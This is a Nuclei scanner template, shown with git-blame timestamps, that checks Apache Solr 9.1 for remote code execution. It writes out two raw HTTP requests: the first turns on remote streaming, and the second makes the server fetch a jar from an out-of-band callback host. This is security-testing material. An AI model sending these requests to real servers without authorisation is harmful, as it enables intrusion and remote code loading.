2023-08-01 05:27:33 +00:00
|
|
|
id: apache-solr-rce
|
2023-04-14 15:18:11 +00:00
|
|
|
|
|
|
|
info:
|
2023-08-01 05:27:33 +00:00
|
|
|
name: Apache Solr 9.1 - Remote Code Execution
|
2023-04-14 15:18:11 +00:00
|
|
|
author: j4vaovo
|
|
|
|
severity: critical
|
2024-01-02 15:45:12 +00:00
|
|
|
description: Apache Solr 9.1 is vulnerable to RCE.
|
2023-04-14 15:18:11 +00:00
|
|
|
reference:
|
2023-08-01 05:27:33 +00:00
|
|
|
- https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
|
2023-08-02 08:15:54 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: solr,apache,rce,oast,intrusive
|
2023-04-14 15:18:11 +00:00
|
|
|
|
2023-08-01 05:27:33 +00:00
|
|
|
http:
|
2023-04-14 15:18:11 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
|
|
|
|
- |
|
|
|
|
POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
|
|
|
|
|
|
|
|
--------------------------5897997e44b07bf9
|
|
|
|
Content-Disposition: form-data; name="stream.url"
|
|
|
|
|
|
|
|
jar:http://{{interactsh-url}}/test.jar?!/Test.class
|
|
|
|
--------------------------5897997e44b07bf9--
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "http"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: interactsh_request
|
|
|
|
words:
|
|
|
|
- "User-Agent: Java"
|
2024-01-15 11:49:24 +00:00
|
|
|
# digest: 4a0a00473045022100cb3600463572b923e6f4b47d3f8261b25d16d9795667a1f35875aeba097a8e1f0220576af9325702029aab5e4f16c5d99033f591da500368f8b04e416bc588e69a10:922c64590222798bb761d5b6d8e72950
|